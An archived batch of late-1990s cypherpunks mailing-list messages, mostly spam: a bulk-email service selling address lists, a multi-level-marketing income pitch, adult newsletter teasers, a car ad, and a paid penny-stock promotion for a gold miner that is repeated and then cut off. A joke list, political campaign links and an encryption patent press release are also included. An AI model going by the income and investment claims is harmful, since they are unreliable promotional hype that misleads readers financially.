WATTS, GRIFFIS & McOUAT REPORT


NOTE: For those on the internet who do not want to recieve 
exciting messages 
such as this.....
* To be removed from our mailing list, call us 
direct @ 702-257-8547 ext 143 for removal. 

*We strive to comply with all state and federal laws and to send 
ads only to interested parties.

*This ad is not intended for nor do we knowingly send to 
Washington State residents. 

* OR CLICK_HERE_TO_GOTO_REMOVE-LIST.COM   
(http://remove-list.com)
Remove-List is a free public service offering to help the general 
public
get removed from commercial mailings lists and has not sent this 
message.
If you want their help please add your name to their list and we 
you will
not receive a commercial email from us or any other member bulk 
emailer.

* Responding to the "return address" will NOT have your name 
removed. 




 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: emailking.associates@cwix.com
Date: Wed, 30 Sep 1998 15:19:19 -0700 (PDT)
To: <owner-coderpunks@toad.com>
Subject: advertisement
Message-ID: <199809302219.PAA23529@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


561 540 4028				       561 540 4028      
          


		   E MAIL KING AND ASSOCIATES
		  PUTS MONEY INTO YOUR POCKET!!

OUR COMPANY HAS OVER 3 YEARS PROVEN E MAIL BLASTING EXPERIENCE!

WORK SMARTER BY HAVING QUALIFIED PEOPLE PHONE YOU, ALREADY 
PREPARED TO BUY.

PUT YOUR COLD CALLING DAYS TO AN END.

TRY US OUT TODAY AND JUDGE THE RESULTS FOR YOURSELF! 10,000 E 
MAILS ARE ONLY $125.00 US.

Do you only market your product or service geographically? Not a 
problem with E Mail King. We can target your e-mail broadcastes 
into the city of your choosing!

FOR THOSE OF YOU WHO NEED MAILING CONTINOUSLY DONE, WE WILL E 
MAIL YOUR ADD TO 7500 DIFFERENT ADDRESSES DAILY MONDAY THROUGH 
FRIDAY MONTH AFTER MONTH FOR ONLY $250.00 PER MONTH. CALL TODAY 
FOR DETAILS ON THIS FANTASTIC OFFER!!

We provide bulk freindly web hosting! Our rates are $125.00 per 
month with a $75.00 set up fee. 

IF YOU ALREADY HAVE YOUR OWN E MAIL SYSTEM, WHY NOT TRY OUR 
SUBCRIPTION SERVICE WHERE YOU WILL RECEIVE 50,000 FRESH GOOD E 
MAIL ADDRESSES EVERY MONTH FOR ONLY $90.00.

ARE YOU INTERESTED IN BEING AN E MAIL KING RESELLER? PUT EVEN 
MORE MONEY INTO YOUR POCKET TODAY BY SIGNING UP WITH OUR PROGRAM 
TODAY!! IT DOES NOT COST ANYTHING TO JOIN!!

We accept Visa, Mastercard or Cheque by Fax.
	
James 
phone 561 540 4028

_________________________________________________________________



TO BE REMOVED FROM OUR LIST, email emailking.associates@cwix.com 
and type in "remove" in the subject header or call (561)540 4028

our mailing address is 
EMAIL KING
1790 Bonhill Rd 
Mississauga Ontario
Canada



 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: health@success600.comt
Date: Tue, 29 Sep 1998 04:54:47 -0700 (PDT)
To: Friend
Subject: Health And wealh  -62803
Message-ID: <199809291154.EAA10721@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


This is a FREE offer if you wish to be removed from future mailings, please e-mail 
to... (remove@success600.com) Put remove in the subject and this software will 
automatically block you from their future mailings.

Attention Network Marketers & 
Opportunity Seekers!!
STOP  Wasting your time 
& Money

I'll Show You How To Turn A One Time 
$10 into  $1,500 
Per Month, Per week, or Even Per Day.
Call   800 306 4146

NO RISK-HIGH RETURN PRODUCT 
DRIVEN

We DARE you to compare.
No gimmicks, No Hassles, No Products to Inventory, No Break 
away-No take Away
No Hoops to jump Through, Hottest Comp Plan Ever
Are You Starting to get the Picture? 
Get Paid NOW!  For What You Do NOW!

Earn $1,500 over & over 
Again!

You Ask Why is this so Different? 

Call 2 minute overview  800  600-0343 Ex 
1489

Then  Call   800 306 4146
 for more Information 

Get The Facts, Call Our Simple Proven System


The First 10 To join the "Master Plan" 
 I will send 125,000 Emails (FREE) to jump start your 
Business 

Solid  Debt FREE company, Not a startup
Sizzle product with good Documentation, MSM.
One time out of pocket of $10, $60, $160, or 460
Toll Free telesponsoring, 24 hours a day. (No more Orphans or 
waiting to be Processed)
Sponsor just 2 to qualify for commissions
Get Paid unlimited Depth, calculated daily, 7 days a week,  paid 
Weekly
Serious Upline Support! We are committed to helping everyone
Turn Key Marketing System, co-op Advertising 


Only 1 time $10  Could make you more money than you Dreamed 
of!!!
For $10 one time fee, you could build up to $45,000 per MONTH 

Easy program to promote..... You don't have to sell anyone on the 
product! 
Everyone knows the product.  one of the HOTTEST Products in 
the industry!!

Have fun! This is easy, simple, no-brainer, uncomplicated 
program!!!

Call   800 306 4146
to get started






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Tue, 29 Sep 1998 06:18:08 -0700 (PDT)
To: (STUFFED TUESDAY SEPTEMBER 29 1998)
Subject: TODAY'S NEWS AND PICS PACKED STUFFED! - READ IT NOW!
Message-ID: <19980929071000.11862.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 FREE HOT JPEG PHOTOS
+ 5 SUPER SEXY STORIES
+ TONGUE TWISTER
+ SEX AGE AND UNDERPANTS
+ APHRODISIACS
+ THE BEST OF EUREKA
+ WE ALL LOVE OUR PORN
+ LA VIDA CALIENTE
+ BABY EATING PYTHON
+ SAN FRANCISCO SEX REACTION
+ BIRTHDAY GIRL-ERICKA

       ---->   http://stuffed.net/98/9/29/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/29/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leif Ericksen <leif@imho.net>
Date: Tue, 29 Sep 1998 06:38:48 -0700 (PDT)
Subject: Bill Gates Jokes
Message-ID: <3610E19E.A6070FEB@imho.net>
MIME-Version: 1.0
Content-Type: text/plain


This is a top ten list of how to Irritate Bill Gates...  To funny to not
post!
> 
> Today's MailBits.com Joke:
> 
> >From the Home Office in Wahoo, Nebraska,
> it's the Top Ten List for April 21, 1998 
> 
> Top Ten Ways to Irritate Bill Gates
> 
> 
> 10. Steal his "nerdboy" license plate. 
> 
> 9. Accuse him of sexually harassing your laser jet printer.
> 
> 8. Beat his high score on Tetris. 
> 
> 7. Ask him if they caught the guy who did that to his hair.
> 
> 6. Tell him you heard he's "microsoft." 
> 
> 5. Leave his Spock ears on your dashboard so they melt. 
> 
> 4. Let the air out of the tires on the Gatesmobile. 
> 
> 3. Drop hints that Oprah's richer than he is. 
> 
> 2. WWW him right in the dot-com. 
> 
> 1. Two words: dork tax. 
> 
> 
> ========
> Did you see today's advertiser (above)?
> 
> They need you to fill out surveys--and they'll PAY YOU!
> 
> Have a look.
> ========
> 
> 
> 
> ==> Want to forward this mailing to a friend? Go ahead! But
> be sure to forward the whole message (including the
> copyright notice below).
> 
> 
> (C) Copyright MailBits.com 1998. To subscribe to this free
> mailing, go to http://www.MailBits.com/Jokes or, for
> automatic subscription, send email to Jokes@MailBits.com
> 
> 
> 
> ____________________
> This email is part of your joke-a-day subscription. You can
> cancel your subscription at any time by going to
> http://www.mailbits.com/ or by sending email to
> jokes.unsubscribe@mailbits.com
> 
> Know a (clean) joke? Send it to SubmitJokes@MailBits.com
> 
> To contact us, email feedback@mailbits.com
> 
> 
> 
			- lhe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Balson" <mb2657b@enterprise.powerup.com.au>
Date: Mon, 28 Sep 1998 17:48:40 -0700 (PDT)
To: <Undisclosed.Recipients>
Subject: One Nation Update
Message-ID: <014d01bdeb43$18be41e0$f81c64cb@QU.fox.uq.net.ai>
MIME-Version: 1.0
Content-Type: text/plain





Dear One Nation supporters in 
NSW 
Later today Pauline Hanson will launch the One 
Nation campaign in Gatton.
 
In the meantime there are two new pages on the 
Internet worth visiting
 
The day Pauline Hanson defeated the politically correct 
lobby
<A 
href="http://www.gwb.com.au/gwb/news/onenation/federal/28sept">http://www.gwb.com.au/gwb/news/onenation/federal/28sept
 
Liberals and Nationals lump law abiding firearm owners in with 
paedophiles
<A 
href="http://www.gwb.com.au/onenation/press/290998.html">http://www.gwb.com.au/onenation/press/290998.html
(With a link to the Liberal web site page)
 
Please have a look at further policy updates at:
<A 
href="http://www.gwb.com.au/onenation/policy.html">http://www.gwb.com.au/onenation/policy.html
 
and don't forget the Federal Election pages at:
<A 
href="http://www.gwb.com.au/onenation/federal">http://www.gwb.com.au/onenation/federal
 
Finally, on Saturday you can participate in real time chat 
with hundreds of others, View:
<A 
href="http://www.gwb.com.au/onenation/forum.html">http://www.gwb.com.au/onenation/forum.html
to find out how.
 
GWB
 
 
 
Scott Balson
Pauline Hanson's One Nation Web 
Master


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Balson" <mb2657b@enterprise.powerup.com.au>
Date: Tue, 29 Sep 1998 13:06:57 -0700 (PDT)
To: <Undisclosed.Recipients>
Subject: One Nation launch - the day the media snapped
Message-ID: <004b01bdebe4$fcd91d40$f81c64cb@QU.fox.uq.net.ai>
MIME-Version: 1.0
Content-Type: text/plain





Dear One Nation supporter, 
 
Please take time to view this report with images of the One 
Nation launch yesterday.
 
<A 
href="http://www.gwb.com.au/gwb/news/onenation/federal/launch/">http://www.gwb.com.au/gwb/news/onenation/federal/launch/
 
GWB
 
 
 
Scott Balson


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: accutone@earthlink.net
Date: Wed, 30 Sep 1998 06:11:44 -0700 (PDT)
To: qunaxawi@toad.com
Subject: 99 Toyotas as low as 2% over invoice
Message-ID: <tjuilyfaraudgtgy>
MIME-Version: 1.0
Content-Type: text/plain


Please accept our appologies for your inconvenience if you are
not interested in this e-mail offer. If you are interested in a new 99'
toyota car, truck, or van at prices as low as 2% over invoice
on selected models and/or huge savings on pre-owned certified toyotas
as well as 100's of other pre-owned vehicles of all makes and models
below kelly blue book, please respond with your name, phone #,
e-mail address and the specific model you are interested in.
Please include all the required information that we have requested, 
or there will be a delay processing your request. We thank you for your
 time. please accept our apologies for the intrusion and de-select yourself 
from our mailing list if not interested. Thank you.  
                





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Wed, 30 Sep 1998 01:17:10 -0700 (PDT)
To: (STUFFED WEDNESDAY SEPTEMBER 30 1998)
Subject: TODAY'S NEWS AND PICS PACKED STUFFED! - READ IT NOW!
Message-ID: <19980930071000.693.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 FREE HOT JPEG PHOTOS
+ 5 SUPER SEXY STORIES
+ GETTING GIRLS HORNY
+ COW SABATOGE
+ BAD BOYS, BAD BOYS
+ THE BEST OF EUREKA
+ BILL KNOCKS PAMELA DOWN TO 2ND
+ THE EVIL ALIENS ARE COMING
+ LOONY TUNES AND MORE

       ---->   http://stuffed.net/98/9/30/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/30/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bubba219@mailexcite.com
Date: Thu, 1 Oct 1998 07:51:18 -0700 (PDT)
To: <gnu@toad.com>
Subject: MAJOR STOCK ALERT!!  A 3 MILLION GOLD RESOURCE  CONFIRMED!!
Message-ID: <199810011450.HAA01797@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



GOLD RIDGE INVESTMENT CORP. ANNOUNCES:


GOLD MARKET RECOVERY GAINING STRENGTH - 
INVESTORS SHIFTING ATTENTION TO UNDERVALUED 
COMPANIES WITH WORLD-CLASS GOLD DEPOSITS 

EMGOLD MINING'S 100%-OWNED IDAHO-MARYLAND 
PROJECT HOSTS 2.97 MILLION OUNCE RESOURCE - 
TO BE DEVELOPED @ 140,000 oz/yr @ US$215 / oz Au


EMGOLD MINING CORPORATION ("EMR" - VSE)
1610 - 777 Dunsmuir Street, P. O. Box 10435
Vancouver, BC  V7Y 1K4  Canada
Phone: (604) 687 - 4622    Fax: (604) 687 - 4212
Toll-Free:  (888) 267 - 1400
website:  http://www.emgold.com


Introduction

EMGOLD MINING CORP. has made significant progress 
in bringing the historic Idaho-Maryland gold mine 
to a production decision.  Recent engineering studies 
indicate that less than half of the known gold has been 
extracted from the deposit, and that a 3,000,000 ounce 
resource remains to be mined.


History & Past Production

The Idaho-Maryland gold mine was discovered in 1851, 
and was in nearly-continuous production from 1862 
through 1956.  Total recorded production from the mine 
was 2,383,000 ounces of gold from 5,546,000 tons of ore 
(0.43 oz/ton recovered grade).  When the mine closed in 
1956 due to escalating costs and the fixed price of gold 
of US$35/oz, mining operations were underway on 25 different 
faces on 6 different levels.


Large Mineralized System Defined - Extensive Infrastructure 
In Place The Idaho-Maryland vein system is 9,000 feet long, 
up to 3,000 feet wide, and has been partially-mined from 
surface to the 2000 foot level.  Access to the mine's 15 
working levels is provided by the three-compartment, 
3,460-foot deep New Brunswick Shaft.  Over 70 miles of 
underground tunnels and workings provide access to much 
of the property.


A Three Million Ounce Gold Resource Has Been Defined....
A 1992 study by James Askew and Associates Inc. estimated 
that the remaining gold resources and potential 
mineralization between the 2000 and 3280 levels of the 
Idaho-Maryland mine are 9,117,500 ST @ 0.326 oz Au/ST 
(containing 2,968,400 oz Au).  This resource estimate 
excludes the potential for large, bulk tonnage targets 
identified by EMGOLD in 1997.  


Upside Potential:  3,000,000+ oz Au

Located within the wedge-shaped confines of three 
bounding faults, a 3-D geologic model developed for 
the Idaho-Maryland mine demonstrates the potential 
for continuity of the existing vein system to a 
vertical depth of 5,000 feet (the Idaho-Maryland 
mine is essentially unexplored below a depth of 3,280 feet).

What is not widely known is that the adjoining Empire 
mine produced six million ounces of gold to a depth of 
5,200 feet!  This fact, combined with the knowledge that 
all mineralized structures developed on the lowest levels 
of the Idaho-Maryland mine remain open at depth, supports 
EMGOLD's belief that considerably more ore may exist at depth.


Development Program (1998 - 1999)

EMGOLD's plans for reviving the Idaho-Maryland mine are to 
first de-water the mine, and then go underground to do further 
exploration to prove up the total resource potential.   
EMGOLD has applied for and been granted all permits necessary 
for re-opening the New Brunswick shaft, de-watering the mine 
and completing a bankable feasibility.


Potential Gold Production of at Least 140,000 oz / 
yr @ US$215 / oz Au EMGOLD plans to resume operations at 
the Idaho-Maryland mine at an initial mining rate of 
1,500 ST ore / day, which would produce approximately 
140,000 ounces of gold per year.  With the addition of 
a second shaft, it may be possible to increase production 
to 5,000 ST/day - at this production level, the Idaho-Maryland 
mine would produce over 200,000 ounces of gold per year 
(on par with other major mines).

Recent studies indicate that the Idaho-Maryland mine could 
be profitably developed and operated at a long-term gold 
price of US$300/oz based on an estimated operating cost 
(excluding capital and royalties) of US$215 per ounce.  


Current Market Conditions

The current gold rally is gaining strength with each 
passing day!

In the past month, bullion prices have risen nearly 10%.  
Yesterday, the Philadelphia XAU gold and silver index 
closed at 74.69, up 53% from its record low of 48.67 
set in late August.
Mining stocks have regained favor with major Wall 
Street firms:  Merrill Lynch has initiated coverage of 
Placer Dome, Barrick, TVX and Kinross, while Bear Stearns 
has upgraded the recommendations of Asarco, Cyprus Amax 
and Phelps Dodge.

To a large extent, the market rebound has largely 
benefited the major mining companies, whose share 
prices are now fully-valued (or even
over-valued) at current gold prices.  However, we 
believe that, as the current rally continues, investors 
will increasingly seek out undervalued junior exploration 
and development companies with multi-million ounce gold deposits.


Opportunity for Investors

Trading at a tremendous discount to its fair market value, 
EMGOLD offers investors a low-risk investment opportunity 
in the current market environment, and a chance to accumulate 
a significant position in a stock that can be expected to 
rally strongly as gold prices move above US$300 / oz. 

With just 11.5 million shares outstanding (14 million 
fully-diluted) 
and a current share price of Cdn$0.28, the equity markets are 
valuing the Idaho-Maryland gold mine at just Cdn$1.06 per 
ounce of gold (Cdn$1.35 / oz Au on a fully-diluted basis).  


EMGOLD's  Idaho-Maryland mine offers one of the best advanced 
exploration / developmental prospects available in North America. 
 
With inferred resources of almost three million ounces, 
nearly one hundred years of operating history, an existing 
3,400-foot, three-compartment  shaft and 70+ miles of 
underground workings, EMGOLD has 100% control of a world-class 
gold project with the vast majority of the expensive 
infrastructure in place and ready to go.


For more information, please contact Andrew Hunter
toll-free at 1 - 888 - 267 - 1400



Disclaimer: The information contained herein has been 
compiled or derived from sources believed reliable and 
contains information and opinions which are accurate 
and complete.  However, Gold Ridge makes no representation 
or warranty, express or implied, in respect thereof, 
takes no responsibility for any errors and omissions 
which may be contained herein and accepts no liability 
whatsoever for any loss arising from any use or reliance 
upon this report or its contents.  The information provided 
is for information purposes only and should not be construed 
as, and shall not form part of an offer or solicitation to 
but or sell any securities.  Emgold Mining has
paid Gold Ridge a fee of US$20,000.00 for preparing and 
disseminating this information.


--------------------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN">

<HEAD>

<META content=text/html;charset=iso-8859-1 
http-equiv=Content-Type>
<META content='"MSHTML 4.72.3110.7"' name=GENERATOR>
</HEAD>

<DIV>
<DIV>GOLD RIDGE INVESTMENT CORP. ANNOUNCES:


GOLD MARKET RECOVERY 
GAINING STRENGTH - INVESTORS SHIFTING ATTENTION TO 
UNDERVALUED COMPANIES WITH 
WORLD-CLASS GOLD DEPOSITS 

EMGOLD MINING'S 100%-OWNED IDAHO-MARYLAND 
PROJECT HOSTS 2.97 MILLION OUNCE RESOURCE - TO BE DEVELOPED @ 
140,000 oz/yr @ 
US$215 / oz Au


EMGOLD MINING CORPORATION (&quot;EMR&quot; - 
VSE)
1610 - 777 Dunsmuir Street, P. O. Box 10435
Vancouver, BC&nbsp; V7Y 
1K4&nbsp; Canada
Phone: (604) 687 - 4622&nbsp;&nbsp;&nbsp; Fax: (604) 687 - 
4212
Toll-Free:&nbsp; (888) 267 - 1400
website:&nbsp; http://www.emgold.com


Introduction</DIV>
<DIV>
EMGOLD MINING CORP. has made significant progress in bringing the 
historic Idaho-Maryland gold mine to a production decision.&nbsp; 
Recent 
engineering studies indicate that less than half of the known 
gold has been 
extracted from the deposit, and that a 3,000,000 ounce resource 
remains to be 
mined.


History &amp; Past Production</DIV>
<DIV>
The Idaho-Maryland gold mine was discovered in 1851, and was 
in
nearly-continuous production from 1862 through 1956.&nbsp; Total 
recorded 
production from the mine was 2,383,000 ounces of gold from 
5,546,000 tons of ore 
(0.43 oz/ton recovered grade).&nbsp; When the mine closed in 1956 
due to 
escalating costs and the fixed price of gold of US$35/oz, mining 
operations were 
underway on 25 different faces on 6 different levels.


Large 
Mineralized System Defined - Extensive Infrastructure In Place
The 
Idaho-Maryland vein system is 9,000 feet long, up to 3,000 feet 
wide, and has 
been partially-mined from surface to the 2000 foot level.&nbsp; 
Access to the 
mine's 15 working levels is provided by the three-compartment, 
3,460-foot deep 
New Brunswick Shaft.&nbsp; Over 70 miles of underground tunnels 
and workings 
provide access to much of the property.


A Three Million Ounce Gold 
Resource Has Been Defined&hellip;.
A 1992 study by James Askew and Associates 
Inc. estimated that the
remaining gold resources and potential mineralization 
between the 2000 and 3280 levels of the Idaho-Maryland mine are 
9,117,500 ST @ 
0.326 oz Au/ST (containing 2,968,400 oz Au).&nbsp; This resource 
estimate 
excludes the potential for large, bulk tonnage targets identified 
by EMGOLD in 
1997.&nbsp; 


Upside Potential:&nbsp; 3,000,000+ oz Au</DIV>
<DIV>
Located within the wedge-shaped confines of three bounding 
faults, a 
3-D geologic model developed for the Idaho-Maryland mine 
demonstrates the 
potential for continuity of the existing vein system to a 
vertical depth of 
5,000 feet (the Idaho-Maryland mine is essentially unexplored 
below a depth of 
3,280 feet).

What is not widely known is that the adjoining Empire mine 
produced six million ounces of gold to a depth of 5,200 
feet!&nbsp; This fact, 
combined with the knowledge that all mineralized structures 
developed on the 
lowest levels of the Idaho-Maryland mine remain open at depth, 
supports EMGOLD's 
belief that considerably more ore may exist at depth.


Development 
Program (1998 - 1999)</DIV>
<DIV>
EMGOLD's plans for reviving the Idaho-Maryland mine are to first 
de-water the mine, and then go underground to do further 
exploration to prove up 
the total resource potential.&nbsp;&nbsp; EMGOLD has applied for 
and been 
granted all permits necessary for re-opening the New Brunswick 
shaft, 
de-watering the mine and completing a bankable feasibility.


Potential 
Gold Production of at Least 140,000 oz / yr @ US$215 / oz Au 
EMGOLD plans to 
resume operations at the Idaho-Maryland mine at an initial mining 
rate of 1,500 
ST ore / day, which would produce approximately 140,000 ounces of 
gold per 
year.&nbsp; With the addition of a second shaft, it may be 
possible to increase 
production to 5,000 ST/day - at this production level, the 
Idaho-Maryland mine 
would produce over 200,000 ounces of gold per year (on par with 
other major 
mines).

Recent studies indicate that the Idaho-Maryland mine could be 
profitably developed and operated at a long-term gold price of 
US$300/oz based 
on an estimated operating cost (excluding capital and royalties) 
of US$215 per 
ounce.&nbsp; 


Current Market Conditions</DIV>
<DIV>
The current gold rally is gaining strength with each passing 
day!

In the past month, bullion prices have risen nearly 10%.&nbsp; 
Yesterday, the Philadelphia XAU gold and silver index closed at 
74.69, up 53% 
from its record low of 48.67 set in late August.

Mining stocks have 
regained favor with major Wall Street firms:&nbsp; Merrill Lynch 
has initiated 
coverage of Placer Dome, Barrick, TVX and Kinross, while Bear 
Stearns has 
upgraded the recommendations of Asarco, Cyprus Amax and Phelps 
Dodge.

To 
a large extent, the market rebound has largely benefited the 
major
mining 
companies, whose share prices are now fully-valued (or even
over-valued) at 
current gold prices.&nbsp; However, we believe that, as the
current rally 
continues, investors will increasingly seek out undervalued 
junior exploration 
and development companies with multi-million ounce gold 
deposits.


Opportunity for Investors</DIV>
<DIV>
Trading at a tremendous discount to its fair market value, EMGOLD 
offers investors a low-risk investment opportunity in the current 
market
environment, and a chance to accumulate a significant position in 
a 
stock that can be expected to rally strongly as gold prices move 
above US$300 / 
oz. 

With just 11.5 million shares outstanding (14 million 
fully-diluted) 
and a
current share price of Cdn$0.28, the equity markets are valuing 
the
Idaho-Maryland gold mine at just Cdn$1.06 per ounce of gold 
(Cdn$1.35 / 
oz Au on a fully-diluted basis).&nbsp; 


EMGOLD's&nbsp; Idaho-Maryland 
mine offers one of the best advanced exploration / developmental 
prospects 
available in North America.&nbsp; With inferred resources of 
almost three 
million ounces, nearly one hundred years of operating history, an 
existing 
3,400-foot, three-compartment&nbsp; shaft and 70+ miles of 
underground workings, 
EMGOLD has 100% control of a world-class gold project with the 
vast majority of 
the expensive infrastructure in place and ready to go.


For more 
information, please contact Andrew Hunter
toll-free at 1 - 888 - 267 - 1400



Disclaimer: The information contained herein has been 
compiled or derived from sources believed reliable and contains 
information and 
opinions which are accurate and complete.&nbsp; However, Gold 
Ridge makes no 
representation or warranty, express or implied, in respect 
thereof, takes no 
responsibility for any errors and omissions which may be 
contained herein and 
accepts no liability whatsoever for any loss arising from any use 
or reliance 
upon this report or its contents.&nbsp; The information provided 
is for 
information purposes only and should not be construed as, and 
shall not form 
part of an
offer or solicitation to but or sell any securities.&nbsp; Emgold 
Mining has
paid Gold Ridge a fee of US$20,000.00 for preparing and 
disseminating this information.
</DIV></DIV>


NOTE: For those on the internet who do not want to recieve 
exciting messages 
such as this.....
* To be removed from our mailing list, simple send 
"remove" to the return address.

*We strive to comply with all state and federal laws and 
to send ads only to interested parties.

*This ad is not intended for nor do we knowingly 
send to Washington State residents. 



PRINT THIS AD FOR FUTURE CONSIDERATION!!


 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jack Oswald / CEO / RPK Security" <joswald@rpkusa.com>
Date: Wed, 30 Sep 1998 18:48:42 -0700 (PDT)
To: RPK_Announcements@rpkusa.com
Subject: ANNOUNCEMENT: RPK SECURITY AWARDED PATENTS FOR ENCRYPTONITE ENGINE IN U.S. AND NEW ZEALAND
Message-ID: <199810010139.SAA22313@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


You have received this message because at some time in the past your name was submitted to our e-mail mailing list database.  If you do not wish (or no longer wish) to receive announcements, updates and news concerning the RPK Encryptonite Engine or the RPK InvisiMail e-mail security products, please forward this message to remove@rpkusa.com

-----------------------------------------------------------------------

MEDIA ALERT

CONTACT
Paula Miller						Lyn Oswald
Nadel Phelan, Inc.					RPK Security Inc.
408-439-5570 x277					212-488-9891
paulam@nadelphelan.com				lynoswald@rpkusa.com	


RPK SECURITY AWARDED PATENTS FOR ENCRYPTONITE ENGINE IN U.S. AND NEW ZEALAND

SAN FRANCISCO, CA. September 15, 1998 - RPK Security, Inc., a technology leader in fast public key encryption, today announced that the technology behind the company's uniquely fast public key cryptosystem, the RPK Encryptonite Engine, was awarded U.S. patent number 5,799,088 on August 25, 1998 and New Zealand patent number 277,128 on August 17, 1998.
 
Based on the proven mathematics of Diffie-Hellman Key Exchange, the RPK Encryptonite Engine combines all the benefits of other public key systems (authentication, digital signatures and digital certificates) with the speed of a secret key system into one algorithm. With the superior performance offered by RPK's Encryptonite Engine, applications requiring streaming data, sound, video or large numbers of transactions, such as credit card payments, receive instantaneous responses and secure communication links.

"We believe these patents give us a significant, unique and enforceable competitive advantage over other providers of public key encryption products," said Jack Oswald, president and CEO of RPK Security. "The RPK patents confirm our technology leadership in strong and fast public key cryptography."

With development and distribution facilities outside of the U.S., RPK Security is able to provide its customers with a worldwide strong encryption solution that is available globally, unlike competing products that are restricted by U.S. export regulations. 

ABOUT RPK SECURITY
Founded in 1995, RPK Security, Inc. is a technology leader in fast public key cryptography.  Its flagship RPK Encryptonite(tm) Engine, a uniquely fast and strong public key encryption technology, is available worldwide in custom hardware and software toolkits on multiple platforms.  Developed from widely accepted security mathematics and techniques, the RPK Encryptonite Engine is easily embedded into new and existing hardware and software applications.  RPK's cryptographic research and product development is based in New Zealand, Switzerland and the U.K, with worldwide sales and marketing operations in San Francisco, CA.  Visit RPK's website at www.rpkusa.com or call (212) 488-9891.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bubba219@mailexcite.com
Date: Thu, 1 Oct 1998 08:44:03 -0700 (PDT)
To: <gnu@toad.com>
Subject: MAJOR STOCK ALERT!!  A 3 MILLION GOLD RESOURCE  CONFIRMED!!
Message-ID: <199810011543.IAA02192@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



GOLD RIDGE INVESTMENT CORP. ANNOUNCES:


GOLD MARKET RECOVERY GAINING STRENGTH - 
INVESTORS SHIFTING ATTENTION TO UNDERVALUED 
COMPANIES WITH WORLD-CLASS GOLD DEPOSITS 

EMGOLD MINING'S 100%-OWNED IDAHO-MARYLAND 
PROJECT HOSTS 2.97 MILLION OUNCE RESOURCE - 
TO BE DEVELOPED @ 140,000 oz/yr @ US$215 / oz Au


EMGOLD MINING CORPORATION ("EMR" - VSE)
1610 - 777 Dunsmuir Street, P. O. Box 10435
Vancouver, BC  V7Y 1K4  Canada
Phone: (604) 687 - 4622    Fax: (604) 687 - 4212
Toll-Free:  (888) 267 - 1400
website:  http://www.emgold.com


Introduction

EMGOLD MINING CORP. has made significant progress 
in bringing the historic Idaho-Maryland gold mine 
to a production decision.  Recent engineering studies 
indicate that less than half of the known gold has been 
extracted from the deposit, and that a 3,000,000 ounce 
resource remains to be mined.


History & Past Production

The Idaho-Maryland gold mine was discovered in 1851, 
and was in nearly-continuous production from 1862 
through 1956.  Total recorded production from the mine 
was 2,383,000 ounces of gold from 5,546,000 tons of ore 
(0.43 oz/ton recovered grade).  When the mine closed in 
1956 due to escalating costs and the fixed price of gold 
of US$35/oz, mining operations were underway on 25 different 
faces on 6 different levels.


Large Mineralized System Defined - Extensive Infrastructure 
In Place The Idaho-Maryland vein system is 9,000 feet long, 
up to 3,000 feet wide, and has been partially-mined from 
surface to the 2000 foot level.  Access to the mine's 15 
working levels is provided by the three-compartment, 
3,460-foot deep New Brunswick Shaft.  Over 70 miles of 
underground tunnels and workings provide access to much 
of the property.


A Three Million Ounce Gold Resource Has Been Defined....
A 1992 study by James Askew and Associates Inc. estimated 
that the remaining gold resources and potential 
mineralization between the 2000 and 3280 levels of the 
Idaho-Maryland mine are 9,117,500 ST @ 0.326 oz Au/ST 
(containing 2,968,400 oz Au).  This resource estimate 
excludes the potential for large, bulk tonnage targets 
identified by EMGOLD in 1997.  


Upside Potential:  3,000,000+ oz Au

Located within the wedge-shaped confines of three 
bounding faults, a 3-D geologic model developed for 
the Idaho-Maryland mine demonstrates the potential 
for continuity of the existing vein system to a 
vertical depth of 5,000 feet (the Idaho-Maryland 
mine is essentially unexplored below a depth of 3,280 feet).

What is not widely known is that the adjoining Empire 
mine produced six million ounces of gold to a depth of 
5,200 feet!  This fact, combined with the knowledge that 
all mineralized structures developed on the lowest levels 
of the Idaho-Maryland mine remain open at depth, supports 
EMGOLD's belief that considerably more ore may exist at depth.


Development Program (1998 - 1999)

EMGOLD's plans for reviving the Idaho-Maryland mine are to 
first de-water the mine, and then go underground to do further 
exploration to prove up the total resource potential.   
EMGOLD has applied for and been granted all permits necessary 
for re-opening the New Brunswick shaft, de-watering the mine 
and completing a bankable feasibility.


Potential Gold Production of at Least 140,000 oz / 
yr @ US$215 / oz Au EMGOLD plans to resume operations at 
the Idaho-Maryland mine at an initial mining rate of 
1,500 ST ore / day, which would produce approximately 
140,000 ounces of gold per year.  With the addition of 
